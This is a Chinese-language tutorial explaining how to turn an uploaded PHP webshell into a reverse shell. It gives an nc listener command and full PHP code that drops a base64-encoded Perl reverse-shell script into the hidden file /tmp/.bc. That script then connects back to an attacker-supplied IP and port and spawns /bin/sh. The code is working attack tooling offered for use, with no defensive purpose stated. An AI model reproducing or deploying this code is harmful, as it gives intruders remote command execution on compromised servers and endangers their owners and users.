PHP Webshell 下的端口反弹方法
<p>使用方法:需要将以下代码保存为一个单独的php文件。上传到服务器之后,本地NC监听一个端口,在代码里设置好反弹IP和端口,然后直接访问上传的php文件,就会给 NC 弹回来一个shell。</p><p> 测试实例:先在本地执行 nc -vv -l -p port,然后访问这个php页面 http://www.site.com/phpdkft.php ,本地就会得到一个反弹的shell。 </p>
<p><span><img class="blogimg" src="https://img.jbzj.com/do/uploads/allimg/111111/1558140.png" border="0" small="0" alt="" /></span></p>
<p> </p>
<p><span><img class="blogimg" src="https://img.jbzj.com/do/uploads/allimg/111111/1558141.png" border="0" small="0" alt="" /></span><br /><br />这样每次可以直接访问这个php页面,直接弹回来shell,不用做其他繁琐的操作,下面贴出来已经修改好的代码<br /><br><div class="msgheader"><div class="right"><span style="CURSOR: pointer" class="copybut"><u>复制代码</u></span></div>代码如下:</div><div class="msgborder" id="phpcode5"> <br /><?php <br />function which($pr) { <br />$path = execute("which $pr"); <br />return ($path ? $path : $pr); <br />} <br />function execute($cfe) { <br />$res = ''; <br />if ($cfe) { <br />if(function_exists('exec')) { <br />@exec($cfe,$res); <br />$res = join("\n",$res); <br />} elseif(function_exists('shell_exec')) { <br />$res = @shell_exec($cfe); <br />} elseif(function_exists('system')) { <br />@ob_start(); <br />@system($cfe); <br />$res = @ob_get_contents(); <br />@ob_end_clean(); <br />} elseif(function_exists('passthru')) { <br />@ob_start(); <br />@passthru($cfe); <br />$res = @ob_get_contents(); <br />@ob_end_clean(); <br />} elseif(@is_resource($f = @popen($cfe,"r"))) { <br />$res = ''; <br />while(!@feof($f)) { <br />$res .= @fread($f,1024); <br />} <br />@pclose($f); <br />} <br />} <br />return $res; <br />} <br />function cf($fname,$text){ <br />if($fp=@fopen($fname,'w')) { <br />@fputs($fp,@base64_decode($text)); <br />@fclose($fp); <br />} <br />} <br />$yourip = "your IP"; <br />$yourport = 'your port'; <br />$usedb = array('perl'=>'perl','c'=>'c'); <br />$back_connect="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGNtZD0gImx5bngiOw0KJHN5c3RlbT0gJ2VjaG8gImB1bmFtZSAtYWAiO2Vj". <br />"aG8gImBpZGAiOy9iaW4vc2gnOw0KJDA9JGNtZDsNCiR0YXJnZXQ9JEFSR1ZbMF07DQokcG9ydD0kQVJHVlsxXTsNCiRpYWRkcj1pbmV0X2F0b24oJHR". <br />"hcmdldCkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRwb3J0LCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKT". <br />"sNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoI". <br />"kVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQi". <br />"KTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgkc3lzdGVtKTsNCmNsb3NlKFNUREl". <br />"OKTsNCmNsb3NlKFNURE9VVCk7DQpjbG9zZShTVERFUlIpOw=="; <br />cf('/tmp/.bc',$back_connect); <br />$res = execute(which('perl')." /tmp/.bc $yourip $yourport &"); <br />?> <br /></div></p>
頁:
[1]